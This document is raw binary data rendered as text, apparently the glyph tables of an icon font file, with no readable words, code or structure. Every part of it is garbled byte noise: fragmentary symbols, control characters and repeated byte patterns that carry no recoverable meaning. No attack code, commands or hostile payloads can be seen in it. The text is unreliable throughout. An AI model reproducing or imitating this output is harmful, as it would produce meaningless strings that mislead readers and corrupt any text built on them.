��V";H&,U# 5.)�54.!,11�� -E%#3%#3."276764'&'&".4>2'54&+"2?64'�Q<(���R9�(<YTHF)**)FH�HF)**)FHV7^77^o^77^	
\
�2X!��!X�*)GH�HF)**)FH�HG)*��7]p^77^p]7�m�
\


�j#R$4!"3!2654&32+"&46"&4627#!"&5463!2�Q$33$�$33����L''8((��]�R3$��$33$:$3$�h'8((8'�l����$-6?HQZ%!2654&+54&+"#"546;2#"264&3"264&3"264&3"264&3"264&3"264&�$$($�%(%%~
�
�!!.  � !-!!�!!.!!�!!.!!�!!.  � !-!!�%
$S$$S$��%�

;�6!.  .!!-!!-!!.  .!!.  .!!. !-!!-! .!�j�R(<654'&'&#"3>32!"3!2>=4&"&=.54>2�$"<=H:hJqL.)F)��6[55[6�6[6T��($4>4$�^PM./?qG8F8a95[6�6[55[6�Dj��@):;(@7!44!7�\+8D%.!.2".4>&'&34&%&'&'&36%4632"..672�^�^A 	'�,I+*JWI+*I�3LF0:��C{e��:(.-5/��*:;).:�96%:.�*IWJ,*KXI*�N,-1'#4E,3�):-5..G9R;-*:���2
%&$!.2'.4676[����<)'�G�dPEB')(&CD�DCPNCD/hd".,41T#(&BD�EB()('���&(����#/;G!"3!2>54.46;2+"&5!"&463!2'!"&463!2'!"&463!2|��2222�� �  � �>
�

��@

��
@
�2��233�  �  ������;"!";!2>54.&546|��33�"22���;2�-2��2�2����
���;"!";!2>54./&4?6|��33�"22����;2�-2��2�2�$�
����� !67&355#35#%#335#35#��jj�Y�1�����������A?��7��[::!NNPOO��NOkO�FO
����/?O_o���%"#'?&+'#54&#!"3!26=!27+"&=46;2+"&=46;2+"&=46;2+"&=46;2346;2+"&5+"&=46;2546;2+"&+"&=46;23##�hm%2�
��

r
$
��

�



6c

5g



?�dhǦ��=~

�%
g;

,#��

,##��

,##��

���������.H]{�&&'&'.7>76'&7>76;'"'&7676'&'&7>'&'&7676'&7>&'&'&'47>767>#%'.=6'46;6�@	gt		(<_
�""
0	
I 2
#=$I$-6&��}I
gW
	��	


��C
*	!�P	
/)dv+:
 �q
p(PbgM
,IYh`P?#`E
$/@-4,59q9
Z<,SiP@
6k`? 3E"
���)LR[bgmrw|���%&'.'..'&>763>67664767676'&&'&'&%&'7&/7%'7&/7&'&'7'7'6?5'5?3&'56 E1X%
gJ
 ?-6"=0-g();
 b�+/-4:jI:p
	
�E�y-(	�U�O

K�
2��7;j	5�
�	J:���0&%A&!N4!#@)E,$7 !5i)g&)�B62+V8
	)6
# �76S5 )!%%@O�F 0U]�3�VV�2
����4Ohq%7'.'&'.'4/567676767>73/&'&'.6767676'&'&'&'&676762"&46� 
3
)��Θ;0�	$	F0��	�# $0bx~]!&4^h~wbL��9g*+:M8#"@6?,+=,,d�#}�


2K#s
�((;
Y!&#?-$J-.,$+6  
-�,<,+=,�i�R)M%'654'&'&"327?6&%".4>2#54&+"#";;26=326=4&��+64Z\�\Z4664Z\k\V�.u��AoAAo�oAAo<Y


Y


Y


Y


=�V\k\Z4664Z\�\Z46+�u.�Ao�oAAo�oAY		Y	

Y


Y
	�i�R)9%'654'&'&"327?6&%".4>2#";26=4&��+64Z\�\Z4664Z\k\V�.u��AoAAo�oAAo<�


�


=�V\k\Z4664Z\�\Z46+�u.�Ao�oAAo�oA



	����#5>a#54#!"#"3!2654&"&746#&"&=46372"&462463!2#54&"#4'4.#54&"#�^$�j^�l.@-/?-��:;;:��.?..@.[Mw[\w3�#
����� -/!--�� -.@-.�q

	��&7DQ_v�#!./47>;63!2?>3731#";26=4#2>4."676.#!"&'&'4'"#&"&56'546;2#%462"&%"&462�:'��'93 G	lnp$;	�f
��<,0080�+=/80/
;��+4 ��S$4%$4%�$4%%4$T�"%.%�!1��+"�
{

xR+=0800�=,0/80�)bIU�_!#*%%3%$%$4%%�i�S5767676'&'&&'5&'547>47>�tpBD('�Z]e�tpBCEBquUX\-*,*/OiRECqu�f]Y�&'ECqttrAD��42dF#
+@
$�_�S9�'&'&'&>7637676?>">'&67>67676?>'&76&746767676#&5676676#&54>76&/.3'&3'.'&&^*&&R9BA?*+1a?1>)�B
"1@+�(
i�P'
!


#"
	

��&9*�+I /*
:jL36D?nG	4
 �K

&"+0

 &v�X,	

	
!		
	�Ī
,(���i�S+8ER_lu&7676'&'&"'&'.767622>4."2>4.""2>4."2>4.'4."2>7>."�e]Y�'(CBqtuqCDDArt�xfc:<;;cg�fd:<;;cg�$?&%?H?&%?O$?&%>H?&$?H$?%%?H?%%?��%>#%>J>$%?n%?H>$%?H>$VR'&�Z]f�tqCDCAqtuqCE�U<9cf�gd:<;:cf�gd:<%>H?%$?H?%$%?G?'%?H?&%?H?$%>H?%�%>I>$&>J=#L$>%&>I?$%?R����0:HTgz�������!.<M��154&+"#+"&=4632764'&+"'"7!26'56''"6;2%632+'&4"#"5&32'&#5#'.743632'+'.7676;2'*"6;2'#47*"5&632&#&"&7546;23"+"&54;2'#"4;2'+"'&546767+&"&56'463725763535&74&#!"36376'6.67'./&3%"2>4.567>#&#&76?6&'&67623?656565654##""#"'&'4'525167632254?474743636;6363727301"#&676743�D�	Z
y<	�


�t		-


	

	




	7Q5
	�B
		

	
		XLf3
	
��
�:ss		�'� K:5U�DsDCr�sCBp�		
�	
O

				_	�
	��
Mk3 ��o<?	

:![#	��
�		NN
= =
�{{

?eYW��
�%&vrRZ'Ar�rECr�rD��
	
"	



3


S :
	��x)&/&&#&3>723267676Y=�.K(*%F6)H-	/R6J?j'	Z�1�.=")J2'H-�
D9$,98O���'=KV�264&>6'=6'5&'&#"&76&5&76737636&5476762.54>&'&'&'&76'#'&'&>76'<'466'&�
'f46,6HKRiZX35O�Z�	.[T'
5

	�.?@\>3x$0$.,96j&-06-jd"1
Y7*�
�!!
��\:!"53XZi^�k'/,s
	W1+q
4@\??/2`)!
 �_
! &_T'"1B;�:1%3"#������j|��%65?6?5&754##"'&3632767676567567476?2"'&'"7676%>'&676&?676&%&32767676�	H%k>;!�!&M,	 $-	8#r4�T""= (P/6'��	)�	*6
�g
		'AhYr^)KF]
	�#HWE#:.) 2C!	&D,D:
+37&!�
		"

3�)	8�g/��5Ed�%.676.'&676''&'&'&'&'&'&/&7>>=3'&'&'&'&/&7>='&'&'&'&/&�G& #;)# �'-(#{

-
"&-!1!+�		�			

�5�D*	62	
,��)	2	
��& 
�O		8	-$	�	
	
�c
i���3'&'&>5476?%76'&'&>54&/��#0	
,K,,KXG(

N

,J,,JXK,0t
>"�p-CF4,A$U	i��-BF5
-A#."#��]H`n#";26=4&"2>4."/&"/&?64/&4?62?62'54&6=2>4.1".4>2��!9!!9B8!!8		>��2S11S2,K,,KYL,,L��:!9B9!!9B9!���
�/�0�
�1TbT1��,LYK,,KZK,�j�S ," 7676'&'&"&5462"&5462�tqCDDCqttqCDDCqt�!.!!.!!.!!.!RDCqt��tqCDDCqttqCD�r!!6!!��!!6!!���n�M(76767654'.'&%.54>)(HF�`_�FH(*GB�c��(+�`�6��
^j^YDCGFBDY^k�tl�G�Y_z:u!	#	���j�S(4"3254'&'&"'&'&476762&/&7%7��trBDEBqt��%DBqu�qa_7997^a�`_6897^`I1J:&RDCru��tpAD%χuqBE�h97^`�a_7897_a�`^69,
�x	����ZS ?^qw7&7>765&54.767>&'&'&/&676&'&.'.7676?6&76764'.'&7~,`�S
�yT 
.Q$W#3SZ$r]?G (D�.JqO��3<
m�xx05V?�1-+�RQ�+.-*�PS�,.��M���ntR�Z
.�Yy0<bX
.wW# 4''O7��N���]&OC"	�* 
-D%YJEQOFJ�JDPOFJI	].��i�S)5A767676'&'&&'&75&7>"&=462"&=462�tpBD('�Z]e�tpBCEBqu�x<|<t&&�&&RECqu�f]Y�&'ECqttrAD��F! ,D/
F%#j�����c&54>
767%�

��8
k�@��X

(
U��	���4A����jVY0�����45&7>76.'&=02326'56.3"#".>;26=6'.'&74'&=4627676'4'&=462;2#"&4624>&7.46'462"&/R3:nQ4Z7<mJ�MM;^18F�001	GwN'�DUQGJ&$(*Q�0&&�%%�%%�&&�Z,4[>
#S:��8`@,Z<�ENigP$
Z;%�&��

LuF$	
A-
�]0))KDR@A
^K�
&�%%|&�j�S	/IVq�27.#" 7676'&'&676'.4''.5&7674676322".4>6767676?6761".6767>#"&�
�tqCDDCqttqCDDCqt��!E
X>um'@%&ANA$&A�





f:	:kB
DCqt��tqCDDCqttqCD��C 	
r=;{&AN@%&AN@%��	%
		t
9e
j<�i�S66767654'.'&6767676'&/'&'&6��tpBD('�Z\e�tqADEBquUY[-* >?z�ECqu�f]Y�&'ECqt��trAD51�/
%

"H$�����("3E�������'"7676'&456'&"7676>'&276767>76'.&/&76'.'&/&63676'&>'&67676'..05&63&&72."'&/&47567672&/&67676&'&'&4676&'&7767676?6&.676'&�
	
��
#��
	 t-�	:!N*!'(;Z
C7538\B
F
05T"!"B.�,B"!@
	
#�~<; 
u>6*K	
 

	�	!
e
		!��-
			�8
	H^+8]q
+&./6,/$5!
8E/4]U#f($
8�;L;��j\'H=	
7		>.)&##=3q)�*	%!$$	&K#�)
�]
$���j
1CVhx�������%&54632%"#=46;456'46732+&&56'7'&"74632'#=46;'#=46;64546;6+&5%&#"=4;2#&"&75&36&#"=4;24546;2+&"5%#&"=4;2#&"=46;2+"&=46;6�
�
��			�

��
	m
�
��



�
	
k

	!
�

�

	!
�
�&R
���#E#	��
#F4NN	;
�56�	X8�8))�W
�
{
 
�	?
i
2
Q
'
O
�k�"'&/&'&"'5&/&'&'&'&11"'5&'&'&'&'&'&"/&'&'&+"3272>76?6?636767676?6767675>7676?>76;5&|
	.	
	

 	

	


*	
		-e	>

!!
 
	

	
			26H;
."H(.&!
#-k>'*:
	.
$0
"!
$!,
&*K$
)		$
8]. 	5	'M&'!%	&-2���h�T)&7>7654'&'&!"&5463!2�i_\�&'BApt�g^[�&(CAor��--. ,,R'&�[]e�sqCF'&�[]f�tpCE�+-. ,, ��-
�j�R/?O_o�����3%2654&#!"32+"&=46#32+"&=46#32+"&=46#32+"&=46!2#!"&546#"&=46;23#"&=46;23#"&=46;23#"&=46;2#"&=46;2#"&=46;2&'&?64
�

�I
�4
4
�6

6
�66
�A
A
	a

��
LA

A�6

6�6

6
�4

4�=

=

=

=��K�		�
:�H

�
Z

Z
\

\
Z

Z
Z

Z
�
�

�
�%
Z
Z

ZZ

[

[

Z
Z

[
[

[
[
��(L

�

u���p�F%5>Tet2326'.#!"3!26=&74&#!"&=6'&62.'&>"&4627654&%>'.#"%>'.#"��
$��%	"1$�^�!9" 9 #:# :�$%2%%� N'06JE		 �2)F),G),J(,$%��!8!#9 $: #;�	�*$z�Q	�!6 #;$!8 "<$�$4$%4$�:&>�B*92N,J,(E)-K+(G#;#7!$<B8 ��p 1CUl��!#7%>'&'.#3!265'54&32+"&767>632+&?6+"&?6763632%&'&/&6?62&/&6?&/5&?6762.46b�
�	��p�\��Rm	
�	AeRR
=f	
	j	�."!'�'+
/� �
F#K=	�m�
_7.08'�5	3
1	
''
A
^!!����?"#"54'.+>54."#>4."#"3!27676=;2654&�z	y+6,JXK,6,�1:1@h
z 	nH�	Q1,J,,J,2P1:11:1�C
~I
*

����8Sd454&6=4764'&%&'&6767674&'&"27674%"#";2654&%"&"2767&�(�)Fu<�,[�v!p�`"xK	t�K67n�" 
G�a`
Y��%@
�
?|lM
�Ǒb��c&{Q"c�Y:h�u�
FE
;^^���!>56'.+";2676'67676'&'&D	S��

��i

�
4".D])(_^�	H���
�\�!50;>2;;pwqmkZ�f�V,FV%4=6=4764'&4=4&#&"3.767&'&676&;��z��hk6	�Q/@ uu!-+.	^�
$	�	
$	�
%,Q	zB~��8:�
 T �98��� � /-\0N|}�	�y$
	�$���!56'.+";2676'�	S��

��i

^�	H���
�\����=[x5.+";27&'.?67676'&%27>&'&"67676&'&��
]	_	~?
�
1H"(

B,	H(J%��1)
9
O1=T|	#>7@_�
�n8	T&%(	XXibi^$)RU��f`
7;YXOP
	

]��\V	#!(V)#'
LPL�=����RU#54'54/&'&'&'&'&/&#&+&"33?273676767676?�
!7#7221C!2dT,-17.
 J��>+E���	"')'&% Z- !4>*0!GR���2Xdp������1!"3!2>54.#576725164'#'6?63213"##"&514632&'#3267#5##53353#3#3#53#"&514632&'#'#"1"#12?'#53737"&51462"&=3326=3##5#531"&51462O�J)G))G)�)G))G�o<	
	
9
\G($$(==8	=K""M GB�
�)G*��*G))G*�*G)��	
		LLKL!+&+*+99&	�/DQh���������14632.#"3267#"&#57>4&"'>32;27"&51462&"7"26514&>=4&#"63235#"&5146327&#"327'%3353535#535#35#%#"&=#2=+5#3573'"&514627&#"327'7"26514&"&51462%#5#35335##^<1R11R1<_#uU(	
	
:G2$#5 }$�	
1A			


���$66$;pF


t��^#8G1RbR1H8	$#"
		


$#T2	
	


	311(
	C%%%C&


	3"


CC
��E}�	9e~�����!"3!2>54.676?54'.#'"767676"'&/#"'.'32367267>+"=4&"+"='&"#"=&&'5#"'&/57>36?254'4&#'"&7>##'#"/"/"/&/&/&/46333337362672?2?63727#5"6?67567645'."#'43736&3?6367&'&/"'5476?305#"=4;237#"'&'&56767672#"=4&'&+"=4;23476?636%"676=4676=4&+"7.36?6=413O�J)G))G)�)G))G�@

�			$

	

C

	,




	
	!?

g	
Z	
��	�
�
		o�)G*��*G))G*�*G)��



&
	V	IF:D:dl			
	

#		
	
(
		
	4>
Ad	

A5	
	!		>	

N��9J����"��
&'&75<'&'.26567672767?6'&'&7676;62326=47>;2=7676;2=4'5.&#54+"%32767?6&/&=4'.'&676"7>;2.%4'&'&"#54+";2=7676;25'&'&37>76'&&'&'.5#7676&##""#/&/	"/&/&/&3223;76232?6?676?6?6?>7&'#5?65&754+";76762656'4&'&""&37631#2?6?6?674?6'&'13�	
'!			$:
V		!	:	
$%
	�


+�



"		
	



A6c4&a 		




1	
PZ

UZ		lq�

;		):			1
	�Sa�


&#
1


	�	_
M! 			7			��*Wy������-1@JSXai!"3!2>54.2;2#'4.+#6'23253273#5#+"&/4'#"/4#&"####/+"=36676;273#3#3##5&5&+#532"7#3#3#5373##+532>'4'".76;01#"3##532726&'"&54>3#"37+/&'#"&'4#'#'#"'&63#"325?6532536533'"+3#32?'&5#"#32654'3"#3256&74&+32O�J)G))G)�)G))G�/�
"�
AA
>;(&&(;I1G)(();;>

)">
"W
"!
	
���
(((,/
��
C�)G*��*G))G*�*G)�

0
C0H21,3WH
�

f
I

H}Hs
	
	
	m
3"A
0)o
<cu�EIk{�������!Osw5#'&'.'#'&'4#&#+"'&'.76;5#'";756732;57'67"#"&'&+;2?6773537676'.##535#532&/&'&4?"#53%6?672135#'&/.+&/&'#3676;2;5;72'67.+353235'&'7>"#53'4&'7>.'#"35335&'"#53272#535#535#335#535#535#&'&"+.6;541#&32+327676'&./"/&6;5#&#3676#3�
	


7	6.��23
jk2�,AA@
c	$G,��
0#	
%5!28
�@P%
,)[		
L%)	\A??A```C@@Ca�70-
q
7	
7
�h�wOk=)

TK5+�!
v!*\	),
�	"SwN

nAwR03+�x*
	�v)	
*)v�(



%v��8Hn���!"3!2>54.'&6#'&&'&76762?67'#5437632&'.7676326'4'."'.76367##'67676'&'5327257673%&+#"3767676&>76'5O�J)G))G)�)G))G��
3
	%
	
�+_$�	!%		��

q

�)G*��*G))G*�*G)�#�

*6 
8jS�
�			

	
Ir >&M8Zp0M	g
���D4Cix��&7'&'&&/&7676?67&%&#"35767676'&=43724'&'&#>32#"6?3'&5'".6767637&'&'.+6367676?67%>�,
)//'!<%$	.%-! $#!#)5)� %-	,.
$9!&!
$
	�#	,!
&
;��$|1	"2VE����%82}$q*

%	#*4	
!�Qe$T>/p8	)	
'�"t
&)��!5Qjrvz~��������Sj�����"32?676=/654&+3264&+32!"3!2>54.36762#54/&##5'32#+%676##535#53'53753#"&5533537#'&6;##5#53"#53>;"+"&='#"&/4?4?6?54&"'623#54&+"#53>32'""/.4>?63254#"'>323"&5''"&#'7326'54/"&#&5'76?62'&"3327&#'"3##5#53547632+267#"'&/&'&47>27"#53>;7'#5373"32?6='70#"34&q
	[0�J)G))G)�)G))G�	�@

8��%Lx�������""?��z
,
	)	+

	
			
	(
	


*	
	?	!���T!+t)G*��*G))G*�*G)��60	1U

w(?�}}a|||||��,,	'(	'8	
M%#
''"	vD#$1<���$(,@HQ{������"Re���!?6!5!573#"#"&=37!4'&63#53#53+532'3264&#4&+326".54>354#"'676323"&/527>=/"#54&#"#53>32'#5373##5#53"#53676;2"'.'&4676?6;254&"'62;3#"&'5'2?5'"#54&##53>32"#/73264&/.4?>?2'&"75#535462'"3#"'&/&'5&4?6767632#326574&"7"#53>;0^��	�7n��\��//�.����++S++
NY_$		*)	Z

			
		

	
�$$ g
$$('+.�"='


	^!	
	





/	*	
S
�S:� ҭ�Ȭ��T�		
	G!		P		#	*




	B
Dv
	
L0
#�_13C0==!6+
	
	
	 6
#	%	


% !6��Vt������.5;EKR1!"3!2>54.3#101+01#"1###535#5321"1#01#01#####97&"3#535#536;3333#5#81###01#0101#01#015+'#01#01#01#'#81#015#01#4#'#81#501'01#5'1815'&=035750153015013015017350135373501353015301350;01309021013813015#50901501#9841#8901#5#01'01#81#'01#01##01#01#0109"#"01#"#'3'373431013737320131013339013#535#533#5354#"3#535#536323"####"&=#53533#;53530130537377.#"3#535#53>;0130321303#;01353013730251343735375+0&+"5#'01#'#841#0981#81'01#501#5#015#5#015#5#5#01501#5'015"415&35'501547017471673057582513?21301301330130130130181338153010101301301#;6;01370137357+"5#&#/"401#0150"1#41#141'5#5/5#535476?263736;0133090138130181381301333%4+32#324326=&#"%"3.3"3.O�J)G))G)�)G))G�/

�,		$A,	E
	G9T			
;D-
E1	I1		��
l	�#
C	#
�)G*��*G))G*�*G)��17

#
,#.	#	
$
#
	

��3Q]gk�������535#532#'324#324+7&"3#535#5363254&#"'6323#5#"&547632&"326=#535#535#5335#536323#5354#"3#7#53533#27#"&57&"3#535#53632#"&462#3267'3."#"&462#327'3."7

�D!
L	



	�X%.7
	
-.�++�D!
h
)L
=6�)K
=6T	
e  T#
5
		
'	
5FXr5)$F  %
	
5
6	(
1	(	��1>^�����3Xt��������1BMYb�!"3!2>54.>"'&'7>&'&/&4767#"&5'4;6&5436?63+"&/&"#&"/.76;24+&546;2"'&+"=437274676?632&/#"37273>5#".+5325"+'"5'5+"'&5'&4?6354'&"'6237&'"/"'54?6732&#""33#'"/73264#267#"'.5476767627#54'&""#536?62"#"&=33267'&'&'&4?67>2"#535#53736?62#54&"##'373#267#"&'&/&47>327"#536?6;#"'532?657'373%"32?>="'475/."32?&'&'&+32>4'&"34&3"3.%264&"'6?6"&"&?6&#"'46'76O�J)G))G)�)G))G��&a 
	'	
		 
	~		
(
	:@@Q
	!!

04		#0J4
	3*�K��@"	�#	�	�)G*��*G))G*�*G)� u$S>72

z
	

	�vZW
i			W6�NGxyC	CyC55%		(CQ	C44J@<	>*�'Os����!Uo������#*O[k�'&'6?>'&'&"7.46?'&'&'&#"32+"'&'&3632'6'&'&6;76?'&#&"76766";26'4%"&3&75&74&32?617664&474&&?6&"&2?67>7'"'&'.54?67>3227."754&">32'&#"267;5#'"&4?632"'3726764&/4"#'"46327."37.#"5#3576?>2354'6?6'54/&'&"3276'".4&474>276576?>2354/.#"5#3.+32767>54'&'+5327.#"3267'".5354&4747>7632"#"=#3?'73#53#'#37#.#"32767'"'.5354&4?676327"5#35676354#'#'#"'326?|	&{0
9DJG
%2'Z		"	�6G��	�	�	
[	


(		
?


K
'
	
�))


n	

A<F
Lf	

	A<Q
F!#�!�(
C)�
	
	!�	>��4	2
						$C

07r
		4K
	
			Zb
?TuNBTT		
		%	T3AAT	

d��-:LX!"3!2>54.+&'&767676;6"2>4."'&'&'&676736=46O�J)G))G)�)G))G�(6	Y_8(">"?
<.)��.N-.M\N..NT



�$#�)G*��*G))G*�*G)�!	K4G0#6
",()O.N[N..N\M.�`&=��2=$��3c|���#>Ys���%U���	&3k��������
!"3!2>54.276?7676"'&&756=4'"47276754/"514372361#""=".75&'"4126=4"5767230+"4'.'&6762"'5.'"5'427>2374=6'#"514?27676&2+"4'62+"?32'&;>=4'#476727>3232+"4;6=4&"32+"43'2#"&4626=4/"437>;6+"4'2;2+"570726=&+"&+'"'&767676;&"42=4#"4;0#"327"1/2+&"4325754#"514;654#"5774+"72#'"4326=4+"0"516=0;;253+"4;6=4#"4;2"1'4+";262"51.+"26742&"5'4+2+&"427=4&#"5143#"27"/32#&"472=4#1"4;354&#"514;01#"'"1"4265'41#";02#&"46?4376217"15&+"2#&"5726=4+"'#73;27321'45'4676#'.6754#'&01#&"5736=4"4;21#"0'"&'&63271"'&/4#721#&"514726=4&"4;2254#"4;2#"&'4;2/.+";2#&1"432576?2632171#"432=4#"4;2"36?4121%"64&'&'&'&676?=73276&'&#"6&'&326&";7676&67474&3'3'O�J)G))G)�)G))G.2
l
	
	

=
#	.
J;
3 5"	).
)
"(),	"	



	/


+
"�o%54K55:	
G�		�


���	
Y
�	�)G*��*G))G*�*G)��'
	1!&	
+;F

	&			
G
G&F5�)&
*& "	!

& !
7	

	

G
 &			�5J55K5[3
!	Qi
0
	
8	

	9
	

#����(FWu���3=qz��:FU���EK~���*3=L&'&#"3732767676'&".4>2723";27>&'&"'"232#&=6&%67>'.54&6'.=472?4#'&'&'&7>7673251&54#'&324+"=43>+";5#"&=&#"5431+"3%27673672514+"&=4"#.=4&#"6?4&&'&54;254&'>+""/&/43?6'&'&+"32;6324"&=463624'#5432%2;54+.=4&31#&4+"32#/&'&+"32"31626#"5&7532'5632'"#"32"5/&#"32"3624+"=36'543244&#"32/&/&#"32#734#=307325<&7432'"37>'&#'&547>'37>76/.>;5'4#&&/4#"2324#&=46>&'&54";#"1&'"=4;22=6"+"=4;62&54#'"3#";2574"/4"362=4#&?6;2#"3624'67"'&'&'&#";24+"?4;2";24'6770&+"&2=>;2#"3624'"&=32;654750!0&+"&#";2=>;2#"36224"=4;2212&752'232'4#.=4&"3#"0"##.=4624+&32#";2574"=4624+"32"736#%24+'#"2#"3624+&=4%>&"&7676&'4=4!*	,,'D

%/
� 6  7@7  7�&
	%	

�


	�
u
	��
	#
		
�

		�		
	�
\


	�



	1	
H%�



#�
$D'
��'
	'

&���
	����[

	�' 1&6&7 � 7@8  7A7 �?)&


G@&1.
 ,


'"(9
	1"$;

		/	y
	#


-\M"","# 
+#	 		
>	
!
%F&		*	

+	

%'$%2"E#&
%%/&&u�
>+�������2AQ&'&'&"+"732767676"'&'&476762&7676.'654&�)Ve~/
dJ?�I0Ux�*T?!oY�	��aTR0110RT�UR0220RUL$ 	J�74; �^AJ	.uOb�s�Iq�Z�Q20RU�TR0210RT�TS11>ΊE"D;�j
&�AQ0��� ,3<Rt~����!"3!2>54.32#'##'3#3#3#'73#'62"&4'632&#"327#"&4.'&54632&"#"'73264+53273##!6767676767676?%#32764&4+32O�J)G))G)�)G))GY$'!UE,++,Eh!"6
5i9'(7(U&(
			�$$�)G*��qcYME;3*#��

��)G*��*G))G*�*G)�411|!|TT��'9'(7&6(
		
|8[|*G)
]R	
&%��	9MV_hr|����&+32764+53273#7.46327&#"#"'32654&73275"&54625&#&3"264&"&462'"264&"&462'"2764&'#37#35#535#535#654'&+3533'#532l'..$2
		.  l		

		
"61$* +!�$33I33	5&&5&A  +""!"
(
�+"DF#0Y9779Y�$
.,&M	
��HMj
1h�c	

2E1	% "%	3H33H3�&6&&6R .  . S  -
6l���+$]&
�@@V11��C�0!"3!2>54.6;6#&"="&'&76?>=6'&'&'"=4&/&'&+"#67&'&'&7676;2+"3?6'&'&+"=4;2+"7676&+"4;2&#&#"&/4#'#&/&+6&=4;267675'&'&+"4;2+7#"4;2+"#%6#'".74;2=4'&'&6'6+"5467>'54O�J)G))G)�)G))G��

"
%	
	�[(99J-:(H.;\T
2$0E2	)

<
+( ɦ	3&$/S.�$3�	
-0$(MVI�


�)G*��*G))G*�*G)��\

	'�
TF7$	1'<(T<xB
:u* #		

$9ZZ�
�
.5$
�

Q	
	�I��,<%276?>;2=&+";&'32=&+"636&'&'&'&#"&767676'&63262?;6?64+";2&/&6;24+";2'&/&6;24&+"'&'&2767676?22&'&%&'&7676+"676332%2?>6767;24&#"&=4'&'&'&'&767>736%2;62'4'.8	@2"E%��-#6	#;),)Q8&E]D.Eq=+8-A_:N']B"VE64>&0"�<1)B<!�!	.g�


,	)	
 'V


��	""��P**PVM	/*&-8�cY�	{x	$&F7&B	1Haq&
	

T1DB(*!
9|	


	
~
5%

B
��h��=!"3!2>54.54'5'&/4/&/&/4#&'"5'&/&/&/&/"5/&'576?2?5733&7"#'&#'4#/?6'4'4/&'4#'4/4?525?574316313&5'4'4#4/76&'2'4'6'54'6'71"/676576'4'4'5'&'5'&=4?672733O�J)G))G)�)G))G�/		e

			
 f	 	
�)G*��*G))G*�*G)�3





	
+)N	
**
!&^(B		NK
			

HQ
'	,��(>Gk��&z���!Ais}�����!"3!2>54.#"73'.5&6';&#6'5474+62"&46'6#7'&272=4#673#.654'5'4/4&/&/&/&/&/&/&/&'5656??53073+/41/7>76'4/4/0#&'5'56575253?333/4&/4'5'76&'313021'&57#09#/&/76?6/4'5'5'4'5'5./54?67327+&/&''#/&;63767>656?>'"&4626?&74+.76;#31&4&7'&7>766=&'&'&#.7676"&=423"&=46277267>&'&762+"7"#"?6+&5&54&'"&466&467;%4'&#&6."76'764'&654&676'&67&6=67;26'&3O�J)G))G)�)G))G��


b
-
�		J	




	L
	
		�	
	

	



S



#
&
	/
7x	

��	5!|{
�)G*��*G))G*�*G)��				

�	
"1

!	,	5
<7
7<	

	
"&;I)^$
.$*(

	�!
		%
�/ ��
	
"!?D
,!7
	0
	

q


	�QR���%Koz�����%0Ho}����</&5&5/4/&5'&/##21#72736?50175?6'&%4/&5&'"5/&/41/&##36?6276/4#/&/&/.5&'#/&/"5/#"1##"2223?6?54?6574747476'&35#='&275&&=46%>/&?67>'5&57"36#6'&'432632'&6'676=47#&#732#'.76762?6'&7"264&&'&7>&'&'.#/.#"732676?73>?6'264&"'>'&67#&'&623725&'&76&=4'22375'"=&7567&6'5&'&127676'&77>&'&7>372;65&'&'&#7>74&'&'&'476+"'&6456#"265'454#"265K
	
!

	
��j	]!
		

	��		



�	
�		
	I
�		A		&(
�

 "4>

4
�	
"	
QM
		
,5*Q




	'5MQM$
�
+,

%& \	-	
[
\)
	0	

	4.
9h)0q+JV,	"?d�4$			

*$
�Q$
.
	-.	?$ 10	�`00	+U@�g�Rkn�	k&'4/&/&/&/&/&/&/&'##767?036?476?601&/&'&/&/&/##36?6676/&'&'&5&/&/&/&/&'&'&'#''&/&/##3#36?6?#76?&634?4?656'&�
.#\
&+��&'+
!	
		


7\$	54VE

9


�/>8


!
.



��

+90�E�+	 				

	
			r���	

T�q
	-
		
		q
	
	8

*+1#kfa��A����!"3!2>54.#"75472?67676754##'&'"=6?6;+"=372?2='#.'&76?363354'&'&#5476732+"=4;276&'&'#'7676.+"=4676;22;2+"56'65454;#"O�J)G))G)�)G))G�"Z!! 
Y�X 


	
 

W�U\


QRs	  	 �)G*��*G))G*�*G)�2xFC�"���

K$��t			:�



	����.u����"#";23+";727654&!"#""725676762"/&'"#""3?63##&'&';27>54&!"#""767676547'325#'&;67654&39"2327>.'#"72;7>4&'&#"�XX*4�("
%�<P)7%��XYE!/*)  *..'58</$)#�
,5��XYD0*
g(
	LA�6#�H""
G
!�C,S#
0�+#1j%N�
2';#2	��
E.i
%If�`08>/
�, -j��:g6��1<GU������-8I�����!"3!2>54.'&''&'&76762960#&/#"36:1&/#"21&'#'"3"#"#'4+"7376?6773?37325674&&'&+"62#&76?2#73?6&676?2"#3637##;27#&#&;6167#'3372?372?57##/.'#'&5'46;7015376'4'4/&/#333217+"5>723'#&#"3"#'##'#"3013013013353676'&'4#'&'#&74?3257623?4'#?6#&7>7656'&57467&76+"732676767327&7654&'&7>O�J)G))G)�)G))G�;B>158s5A:�8?U.Q78��/=V'	z'&Z		
$		@	!&L4	
	J	
	6	


S/#�	


	'
		S	T
)
!'		
�)G*��*G))G*�*G)�� 	)

h1<T7118.K-BvBEx29[ZP(-
	A#
		=
		DO
	"



	&.3
S	 
.

����1BPTWZ����������"0;HU.'&./.767>%2;2&/&#632&/&+>>;'.#""&0400#'41"#"&?67#'#5&/+"&?63722?6763723"#75251#&767636&'"674?6?64&63271#"&7497"1&'3275&&"6767&#&"&'632?7&+'#"1"3053/4"1#'#5#01&?576372676'&/&/4'4767##3#"5#"332?673#/&'#01'#5#"4#/&?67#372?637636?3237.+&"&?>;2653'7#"76'.?426;2+"&?674;26#'.767>%"'#3>76&7&;276&2>756&%767>&�PwC}\U�T`
	&M�RM$D]c�Q��
EXt		�	].�6	�	
*	
=��YFn$$35j	+

	`
L

"
a
5G#��3			

	6

�0 ;����
�+2	�		�BnBPGGP{WH�	'=_��$		/I�b
�(S	J%�d@!d2&"	
	bd�6�
$	
-


		+		

e7)yV(,)#nT
3


#��Rm������6>Odo!"3!2>54.&'67#"&'&/&+'.>76365676773&'>%"'#37332?374'&#"72##772367"&7670#&6;7&#"'7676&'747#7#"?2565#&76?>"&734'4'&?25765#'#676&+&"326?6763257&2767'.7'"&'&6"#"6372#"77237>&"&>7"&'#32?6?6727;7#'&#&76.6O�J)G))G)�)G))G�(&N"	 K%'=<'&L 
	"J$(?�F	
1
	


 7


*	
$	8
	5
6




D
	

		�)G*��*G))G*�*G)�C )	*
;QR=
 )
'"
9RSo*G00%	G#
 "		"	
8	

	,	/;	
